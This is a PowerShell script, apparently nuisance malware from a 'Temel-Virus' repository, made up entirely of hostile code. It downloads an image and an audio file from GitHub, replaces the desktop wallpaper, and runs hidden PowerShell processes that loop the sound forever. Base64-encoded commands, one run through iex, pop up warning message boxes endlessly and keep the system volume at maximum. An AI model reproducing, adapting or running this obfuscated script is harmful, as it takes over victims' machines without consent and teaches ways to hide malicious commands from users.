iwr -Uri "https://github.com/GamehunterKaan/Temel-Virus/raw/main/a.jpg" -OutFile "$env:temp\a.jpg"
Function Set-WallPaper($Image) {

Add-Type -TypeDefinition @" 
using System; 
using System.Runtime.InteropServices;
  
public class Params
{ 
    [DllImport("User32.dll",CharSet=CharSet.Unicode)] 
    public static extern int SystemParametersInfo (Int32 uAction, 
                                                   Int32 uParam, 
                                                   String lpvParam, 
                                                   Int32 fuWinIni);
}
"@ 
  
    $SPI_SETDESKWALLPAPER = 0x0014
    $UpdateIniFile = 0x01
    $SendChangeEvent = 0x02
  
    $fWinIni = $UpdateIniFile -bor $SendChangeEvent
  
    $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
 
}
Set-WallPaper -Image "$env:temp\a.jpg"
iwr -Uri "https://github.com/GamehunterKaan/Temel-Virus/blob/main/b.wav?raw=true" -OutFile "$env:temp\a.wav"

Start-Process -f powershell.exe -WindowStyle Hidden -A {
    while ($true) {(New-Object Media.SoundPlayer "$env:temp\a.wav").PlaySync()}
}

start-process -f powershell -WindowStyle Hidden -A {
    -e QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFAAcgBlAHMAZQBuAHQAYQB0AGkAbwBuAEMAbwByAGUALABQAHIAZQBzAGUAbgB0AGEAdABpAG8AbgBGAHIAYQBtAGUAdwBvAHIAawA7AHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAewBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACIAVABlAG0AZQBsAGwAZQBuAGQAaQBuAGkAegAuACIALAAiAFAAYQBoAG0AZQBlAHIAIgAsAFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABCAHUAdAB0AG8AbgBdADoAOgBPAEsALABbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgASQBtAGEAZwBlAF0AOgA6AFcAYQByAG4AaQBuAGcAKQB9AA==
}

powershell {[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("QWRkLVR5cGUgLVR5cGVEZWZpbml0aW9uIEAnDQp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7DQpbR3VpZCgiNUNERjJDODItODQxRS00NTQ2LTk3MjItMENGNzQwNzgyMjlBIiksIEludGVyZmFjZVR5cGUoQ29tSW50ZXJmYWNlVHlwZS5JbnRlcmZhY2VJc0lVbmtub3duKV0NCmludGVyZmFjZSBJQXVkaW9FbmRwb2ludFZvbHVtZQ0Kew0KICAgIC8vIGYoKSwgZygpLCAuLi4gYXJlIHVudXNlZCBDT00gbWV0aG9kIHNsb3RzLiBEZWZpbmUgdGhlc2UgaWYgeW91IGNhcmUNCiAgICBpbnQgZigpOyBpbnQgZygpOyBpbnQgaCgpOyBpbnQgaSgpOw0KICAgIGludCBTZXRNYXN0ZXJWb2x1bWVMZXZlbFNjYWxhcihmbG9hdCBmTGV2ZWwsIFN5c3RlbS5HdWlkIHBndWlkRXZlbnRDb250ZXh0KTsNCiAgICBpbnQgaigpOw0KICAgIGludCBHZXRNYXN0ZXJWb2x1bWVMZXZlbFNjYWxhcihvdXQgZmxvYXQgcGZMZXZlbCk7DQogICAgaW50IGsoKTsgaW50IGwoKTsgaW50IG0oKTsgaW50IG4oKTsNCiAgICBpbnQgU2V0TXV0ZShbTWFyc2hhbEFzKFVubWFuYWdlZFR5cGUuQm9vbCldIGJvb2wgYk11dGUsIFN5c3RlbS5HdWlkIHBndWlkRXZlbnRDb250ZXh0KTsNCiAgICBpbnQgR2V0TXV0ZShvdXQgYm9vbCBwYk11dGUpOw0KfQ0KW0d1aWQoIkQ2NjYwNjNGLTE1ODctNEU0My04MUYxLUI5NDhFODA3MzYzRiIpLCBJbnRlcmZhY2VUeXBlKENvbUludGVyZmFjZVR5cGUuSW50ZXJmYWNlSXNJVW5rbm93bildDQppbnRlcmZhY2UgSU1NRGV2aWNlDQp7DQogICAgaW50IEFjdGl2YXRlKHJlZiBTeXN0ZW0uR3VpZCBpZCwgaW50IGNsc0N0eCwgaW50IGFjdGl2YXRpb25QYXJhbXMsIG91dCBJQXVkaW9FbmRwb2ludFZvbHVtZSBhZXYpOw0KfQ0KW0d1aWQoIkE5NTY2NEQyLTk2MTQtNEYzNS1BNzQ2LURFOERCNjM2MTdFNiIpLCBJbnRlcmZhY2VUeXBlKENvbUludGVyZmFjZVR5cGUuSW50ZXJmYWNlSXNJVW5rbm93bildDQppbnRlcmZhY2UgSU1NRGV2aWNlRW51bWVyYXRvcg0Kew0KICAgIGludCBmKCk7IC8vIFVudXNlZA0KICAgIGludCBHZXREZWZhdWx0QXVkaW9FbmRwb2ludChpbnQgZGF0YUZsb3csIGludCByb2xlLCBvdXQgSU1NRGV2aWNlIGVuZHBvaW50KTsNCn0NCltDb21JbXBvcnQsIEd1aWQoIkJDREUwMzk1LUU1MkYtNDY3Qy04RTNELUM0NTc5MjkxNjkyRSIpXSBjbGFzcyBNTURldmljZUVudW1lcmF0b3JDb21PYmplY3QgeyB9DQpwdWJsaWMgY2xhc3MgQXVkaW8NCnsNCiAgICBzdGF0aWMgSUF1ZGlvRW5kcG9pbnRWb2x1bWUgVm9sKCkNCiAgICB7DQogICAgICAgIHZhciBlbnVtZXJhdG9yID0gbmV3IE1NRGV2aWNlRW51bWVyYXRvckNvbU9iamVjdCgpIGFzIElNTURldmljZUVudW1lcmF0b3I7DQogICAgICAgIElNTURldmljZSBkZXYgPSBudWxsOw0KICAgICAgICBNYXJzaGFsLlRocm93RXhjZXB0aW9uRm9ySFIoZW51bWVyYXRvci5HZXREZWZhdWx0QXVkaW9FbmRwb2ludCgvKmVSZW5kZXIqLyAwLCAvKmVNdWx0aW1lZGlhKi8gMSwgb3V0IGRldikpOw0KICAgICAgICBJQXVkaW9FbmRwb2ludFZvbHVtZSBlcHYgPSBudWxsOw0KICAgICAgICB2YXIgZXB2aWQgPSB0eXBlb2YoSUF1ZGlvRW5kcG9pbnRWb2x1bWUpLkdVSUQ7DQogICAgICAgIE1hcnNoYWwuVGhyb3dFeGNlcHRpb25Gb3JIUihkZXYuQWN0aXZhdGUocmVmIGVwdmlkLCAvKkNMU0NUWF9BTEwqLyAyMywgMCwgb3V0IGVwdikpOw0KICAgICAgICByZXR1cm4gZXB2Ow0KICAgIH0NCiAgICBwdWJsaWMgc3RhdGljIGZsb2F0IFZvbHVtZQ0KICAgIHsNCiAgICAgICAgZ2V0IHsgZmxvYXQgdiA9IC0xOyBNYXJzaGFsLlRocm93RXhjZXB0aW9uRm9ySFIoVm9sKCkuR2V0TWFzdGVyVm9sdW1lTGV2ZWxTY2FsYXIob3V0IHYpKTsgcmV0dXJuIHY7IH0NCiAgICAgICAgc2V0IHsgTWFyc2hhbC5UaHJvd0V4Y2VwdGlvbkZvckhSKFZvbCgpLlNldE1hc3RlclZvbHVtZUxldmVsU2NhbGFyKHZhbHVlLCBTeXN0ZW0uR3VpZC5FbXB0eSkpOyB9DQogICAgfQ0KICAgIHB1YmxpYyBzdGF0aWMgYm9vbCBNdXRlDQogICAgew0KICAgICAgICBnZXQgeyBib29sIG11dGU7IE1hcnNoYWwuVGhyb3dFeGNlcHRpb25Gb3JIUihWb2woKS5HZXRNdXRlKG91dCBtdXRlKSk7IHJldHVybiBtdXRlOyB9DQogICAgICAgIHNldCB7IE1hcnNoYWwuVGhyb3dFeGNlcHRpb25Gb3JIUihWb2woKS5TZXRNdXRlKHZhbHVlLCBTeXN0ZW0uR3VpZC5FbXB0eSkpOyB9DQogICAgfQ0KfQ0KJ0ANCg0KV2hpbGUgKCR0cnVlKSB7DQogICAgW2F1ZGlvXTo6Vm9sdW1lICA9IDEuMA0KfQ==")) | iex}
